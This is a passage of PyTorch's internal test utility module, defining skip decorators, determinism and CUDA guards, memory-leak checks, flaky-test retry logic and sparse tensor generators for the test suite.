np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
if IS_WINDOWS:
# Size of `np.intc` is platform defined.
# It is returned by functions like `bitwise_not`.
# On Windows `int` is 32-bit
# https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
numpy_to_torch_dtype_dict[np.intc] = torch.int
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
# Skips a test on CUDA if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
def dec_fn(fn):
@wraps(fn)
def wrap_fn(self, *args, **kwargs):
if not TEST_WITH_ROCM:
reason = "ROCm not available"
raise unittest.SkipTest(reason)
rocm_version = str(torch.version.hip)
rocm_version = rocm_version.split("-")[0] # ignore git sha
rocm_version_tuple = tuple(int(x) for x in rocm_version.split("."))
if rocm_version_tuple is None or version is None or rocm_version_tuple < tuple(version):
reason = "ROCm {0} is available but {1} required".format(rocm_version_tuple, version)
raise unittest.SkipTest(reason)
return fn(self, *args, **kwargs)
return wrap_fn
return dec_fn
def skipIfNotMiopenSuggestNHWC(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
else:
fn(*args, **kwargs)
return wrapper
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
def __init__(self, deterministic, *, warn_only=False):
self.deterministic = deterministic
self.warn_only = warn_only
def __enter__(self):
self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
self.warn_only_restore = torch.is_deterministic_algorithms_warn_only_enabled()
torch.use_deterministic_algorithms(
self.deterministic,
warn_only=self.warn_only)
def __exit__(self, exception_type, exception_value, traceback):
torch.use_deterministic_algorithms(
self.deterministic_restore,
warn_only=self.warn_only_restore)
# Context manager for setting cuda sync debug mode and reset it
# to original value
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
def __init__(self, sync_debug_mode):
self.mode = sync_debug_mode
def __enter__(self):
self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
torch.cuda.set_sync_debug_mode(self.mode)
def __exit__(self, exception_type, exception_value, traceback):
torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with DeterministicGuard(
torch.are_deterministic_algorithms_enabled(),
warn_only=torch.is_deterministic_algorithms_warn_only_enabled()):
class CuBLASConfigGuard:
cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'
def __enter__(self):
self.is_cuda10_2_or_higher = (
(torch.version.cuda is not None)
and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
if self.is_cuda10_2_or_higher:
self.cublas_config_restore = os.environ.get(self.cublas_var_name)
os.environ[self.cublas_var_name] = ':4096:8'
def __exit__(self, exception_type, exception_value, traceback):
if self.is_cuda10_2_or_higher:
cur_cublas_config = os.environ.get(self.cublas_var_name)
if self.cublas_config_restore is None:
if cur_cublas_config is not None:
del os.environ[self.cublas_var_name]
else:
os.environ[self.cublas_var_name] = self.cublas_config_restore
with CuBLASConfigGuard():
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check if 'MyOp' is in the caffe2.python.core
"""
if not BUILD_WITH_CAFFE2:
return unittest.skip("Pytorch is compiled without Caffe2")
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def skipIfOnGHA(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if ON_GHA:
raise unittest.SkipTest("Test disabled for GHA")
else:
fn(*args, **kwargs)
return wrapper
def skipIfTBB(message="This test makes TBB sad"):
def dec_fn(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if IS_TBB:
raise unittest.SkipTest(message)
else:
fn(*args, **kwargs)
return wrapper
return dec_fn
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
# noarch tests are tests that should be only run on one CI configuration,
# because they don't exercise any interesting platform specific code
# and so if run once, indicate the test should pass everywhere.
# See https://github.com/pytorch/pytorch/issues/53743
def noarchTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_SKIP_NOARCH:
raise unittest.SkipTest("test is noarch: we are skipping noarch tests due to TEST_SKIP_NOARCH")
else:
fn(*args, **kwargs)
return wrapper
def slowAwareTest(fn):
fn.__dict__['slow_test'] = True
return fn
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True): # if current True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True): # if current True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.dtype, obj.dtype)
with torch.no_grad():
res = obj.clone().to(dtype=t, device="cuda")
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
# no_dispatch needed for test_composite_compliance
# Some OpInfos use freeze_rng_state for rng determinism, but
# test_composite_compliance overrides dispatch for all torch functions
# which we need to disable to get and set rng state
with no_dispatch():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
try:
yield
finally:
with no_dispatch():
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
try:
yield
finally:
torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
def is_iterable_of_tensors(iterable, include_empty=False):
""" Returns True if iterable is an iterable of tensors and False o.w.
If the iterable is empty, the return value is :attr:`include_empty`
"""
# Tensor itself is iterable so we check this first
if isinstance(iterable, torch.Tensor):
return False
try:
if len(iterable) == 0:
return include_empty
for t in iter(iterable):
if not isinstance(t, torch.Tensor):
return False
except TypeError as te:
return False
return True
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
# Stores CUDA memory data provided by PyTorch's caching allocator and
# the CUDA driver.
#
# NOTE: The undocumented torch.cuda.mem_get_info() returns
# (#free bytes, #total bytes available) on the GPU
def __enter__(self):
self.caching_allocator_befores = []
self.driver_befores = []
# Performs a gc if required (required if any CUDA memory is held)
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
# NOTE: gc is based exclusively on caching allocator memory
# because the driver will always have some bytes in use (context size?)
if caching_allocator_mem_allocated > 0:
gc.collect()
torch.cuda.empty_cache()
break
# Acquires caching allocator and driver statistics before the test is run
for i in range(num_devices):
self.caching_allocator_befores.append(torch.cuda.memory_allocated(i))
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
self.driver_befores.append(driver_mem_allocated)
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
# Compares caching allocator before/after statistics
# An increase in allocated memory is a discrepancy indicating a possible
# memory leak
discrepancy_detected = False
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
discrepancy_detected = True
break
# Short-circuits if no discrepancy detected
if not discrepancy_detected:
return
# Validates the discrepancy persists after garbage collection and
# is confirmed by the driver API
# NOTE: driver API iscrepancies alone are ignored because with the jiterator
# some tests may permanently increase the CUDA context size and
# that will appear as a driver memory leak but is the expected behavior.
# GCs and clears the cache
gc.collect()
torch.cuda.empty_cache()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
caching_allocator_discrepancy = False
driver_discrepancy = False
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
caching_allocator_discrepancy = True
if driver_mem_allocated > self.driver_befores[i]:
driver_discrepancy = True
if caching_allocator_discrepancy and not driver_discrepancy:
# Just raises a warning if the leak is not validated by the
# driver API
# NOTE: this may be a problem with how the caching allocator collects its
# statistics or a leak too small to trigger the allocation of an
# additional block of memory by the CUDA driver
msg = ("CUDA caching allocator reports a memory leak not "
"verified by the driver API in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
warnings.warn(msg)
elif caching_allocator_discrepancy and driver_discrepancy:
# A caching allocator discrepancy validated by the driver API is a
# failure (except on ROCm, see below)
msg = ("CUDA driver API confirmed a leak in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
# See #62533
# ROCM: Sometimes the transient memory is reported as leaked memory
if TEST_WITH_ROCM:
warnings.warn(msg)
else:
raise RuntimeError(msg)
@contextmanager
def skip_exception_type(exc_type):
try:
yield
except exc_type as e:
raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
print('Fail to import hypothesis in common_utils, tests are not derandomized')
def check_if_enable(test: unittest.TestCase):
test_suite = str(test.__class__).split('\'')[1]
test_name = f'{test._testMethodName} ({test_suite})'
if slow_tests_dict is not None and test_name in slow_tests_dict:
getattr(test, test._testMethodName).__dict__['slow_test'] = True
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
if not IS_SANDCASTLE and disabled_tests_dict is not None:
if test_name in disabled_tests_dict:
issue_url, platforms = disabled_tests_dict[test_name]
platform_to_conditional: Dict = {
"mac": IS_MACOS,
"macos": IS_MACOS,
"win": IS_WINDOWS,
"windows": IS_WINDOWS,
"linux": IS_LINUX,
"rocm": TEST_WITH_ROCM,
"asan": TEST_WITH_ASAN
}
if platforms == [] or any([platform_to_conditional[platform] for platform in platforms]):
raise unittest.SkipTest(
f"Test is disabled because an issue exists disabling it: {issue_url}" +
f" for {'all' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " +
"If you're seeing this on your local machine and would like to enable this test, " +
"please make sure IN_CI is not set and you are not using the flag --import-disabled-tests.")
if TEST_SKIP_FAST:
if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# Acquires the comparison dtype, required since isclose
# requires both inputs have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU or CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None and issubclass(exc_type, NotImplementedError):
self.test_case.skipTest(f"not_implemented: {exc_value}") # type: ignore[attr-defined]
return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
old_val = torch.is_warn_always_enabled()
torch.set_warn_always(new_val)
try:
yield
finally:
torch.set_warn_always(old_val)
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
# checker to early terminate test suite if unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
# CUDA device side error will cause subsequence test cases to fail.
# stop entire test suite if catches RuntimeError during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
except RuntimeError as rte:
return True
return False
else:
return False
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
@property
def rel_tol(self) -> float:
return self._rel_tol
@rel_tol.setter
def rel_tol(self, prec: float) -> None:
self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
def wrap_method_with_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
# Recursive function that incorporates retry logic when PYTORCH_RETRY_TEST_CASES=1 and enables early test
# termination. [DISCLAIMER: ONLY WORKS WITH UNITTEST]
# When report_only is True, flaky tests are only reported, but the signal remains the same (the test will still
# show up red).
# Otherwise, the flaky test will show up green while its stats are captured by test reports.
def _run_with_retry(self, result=None, num_runs_left=0, report_only=True):
if num_runs_left == 0:
return
using_unittest = isinstance(result, unittest.TestResult)
if using_unittest:
failures_before = 0 if result is None else len(result.failures) # num tests marked as failed before starting
errors_before = 0 if result is None else len(result.errors) # num tests marked as errored before starting
super().run(result=result)
# Early terminate test if necessary.
if self._should_stop_test_suite():
result.stop()
if not RETRY_TEST_CASES or not using_unittest:
return
err = sys.exc_info()
num_retries_left = num_runs_left - 1
if failures_before < len(result.failures):
print(f" {self._testMethodName} failed - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.failures.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif errors_before < len(result.errors):
print(f" {self._testMethodName} errored - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.errors.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif report_only and num_retries_left < MAX_NUM_RETRIES:
print(f" {self._testMethodName} succeeded - num_retries_left: {num_retries_left}")
result.addUnexpectedSuccess(self)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
def run(self, result=None):
num_runs = MAX_NUM_RETRIES + 1 if RETRY_TEST_CASES else 1
self._run_with_retry(result=result, num_runs_left=num_runs, report_only=not OVERRIDE_FLAKY_SIGNAL)
def setUp(self):
check_if_enable(self)
set_rng_seed(SEED)
@staticmethod
def _make_crow_indices(n_rows, n_cols, nnz,
*, device, dtype, random=True):
"""Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
the number of specified elements nnz.
If random is True, the column counts of rows are in random
order. Otherwise, the column counts of rows are defined by the
used sampling method.
Sampling method
---------------
The used sampling method was introduced in
https://pearu.github.io/csr_sampling.html, and here we give
only an overall description of the method.
Notice that crow_indices can be defined as cumsum(counts)
where counts is a sequence of non-negative integers satisfying
the following conditions:
len(counts) == n_rows + 1
counts.max() <= n_cols
while counts[i + 1] is interpreted as the number of specified
elements in the i-th row.
The used sampling method aims at increasing the diversity of
CSR samples, that is, a CSR sample should contain (i) rows
that are all filled, (ii) rows with no elements at all, and
(iii) rows that are partially filled. At the same time and for
the given total number of specified elements (nnz), there
should be minimal preference to rows with a given number of
elements. To achieve this, the sampling method is built-up on
using a sawteeth model for counts. In the simplest case, we
would have
counts = arange(n_rows + 1) % (n_cols + 1)
that has equal number of all possible column counts per row.
This formula can be used only for specific input values of
n_rows, n_cols, and nnz. To generalize this model to any
combinations of inputs, the counts model above is extended
with an incomplete sawtooth, and the right and lower
rectangular parts that will guarantee that
counts.sum() == nnz
for any combination of n_rows, n_cols, and nnz. Basically,
we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
that is able to hold a sequence of sawteeth and so-called
final correction, while the external part of the window is
filled with counts to meet the nnz contraint exactly.
"""
assert 0 <= nnz <= n_rows * n_cols
def sawteeth(n, m):
# return the total number of counts in the sequence of
# sawteeth where n and m define a window in (n_rows+1,
# n_cols+1) rectangle where the sequence of sawteeth
# perfectly fit.
M = (n_cols - m) * (n_cols - m + 1) // 2
K = (n_rows - n) % (n_cols - m + 1)
return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
# Different from the original method description, here counts
# has leading 0 required by crow_indices:
counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
n = m = 0
N = sawteeth(n, m)
if N and nnz >= max(N, n_cols):
# determine the width of the sawteeth window. We use bisection to solve
# N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
# for n
n_left = n
n_right = n_rows - 1
N_right = sawteeth(n_right, m)
while n_right - n_left > 1:
n_middle = (n_left + n_right) // 2
N_middle = sawteeth(n_middle, m)
if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
n_right, N_right = n_middle, N_middle
else:
n_left = n_middle
n, N = n_right, N_right
# fill the right rectangle with counts:
assert n
counts[-n:].fill_(n_cols)
if N and nnz - n * n_cols >= max(N, n_rows - n):
# determine the height of the sawteeth window. We use bisection to solve
# N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
# for m.
m_left = m
m_right = n_cols - 1
N_right = sawteeth(n, m_right)
while m_right - m_left > 1:
m_middle = (m_left + m_right) // 2
N_middle = sawteeth(n, m_middle)
if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
m_right, N_right = m_middle, N_middle
else:
m_left = m_middle
m, N = m_right, N_right
# fill the bottom rectangle with counts:
assert m
counts[1:n_rows - n + 1].fill_(m)
if N:
# fill the sawteeth window with counts
q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
(n_cols - m) * (n_cols - m + 1) // 2)
p = 1 + q * (n_cols - m + 1)
if sys.version_info >= (3, 8):
k = math.isqrt(2 * r)
else:
# math.isqrt(x) is available starting from Python 3.8.
# Here we use int(math.sqrt(x)) as an approximation
# that appers to give exaxt result for all x values
# less than 2**35, at least, the upper limit of x is
# TBD.
k = int(math.sqrt(2 * r))
if k * (k + 1) > 2 * r:
k -= 1
corr = r - k * (k + 1) // 2
assert not ((p > 1) and (m > 0)) # full sawteeth are never on top of a bottom rectangle
# sequence of full sawteeth:
counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
# incomplete sawtooth:
counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
else:
# given input does not support sawteeth
p = 1
corr = nnz - n * n_cols - m * (n_rows - n)
# correction that will guarantee counts.sum() == nnz:
counts[p] += corr
if random:
# randomize crow_indices by shuffling the sawteeth
# sequence:
perm = torch.randperm(n_rows, device=counts.device)
counts[1:] = counts[1:][perm]
# compute crow_indices:
crow_indices = counts
crow_indices.cumsum_(dim=0)
return crow_indices.to(device=device)
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
sparse_dim = 2
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
assert len(size) == sparse_dim
def random_sparse_csr(n_rows, n_cols, nnz):
crow_indices = self._make_crow_indices(n_rows, n_cols, nnz, device=device, dtype=index_dtype)
col_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_rows):
count = crow_indices[i + 1] - crow_indices[i]
col_indices[crow_indices[i]:crow_indices[i + 1]], _ = torch.sort(
torch.randperm(n_cols, dtype=index_dtype, device=device)[:count])
low = -1 if dtype != torch.uint8 else 0
high = 1 if dtype != torch.uint8 else 2
values = make_tensor([nnz], device=device, dtype=dtype, low=low, high=high)
return values, crow_indices, col_indices
values, crow_indices, col_indices = random_sparse_csr(size[0], size[1], nnz)
return torch.sparse_csr_tensor(crow_indices,
col_indices,
values, size=size, dtype=dtype, device=device)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
return t.coalesce().to_dense()
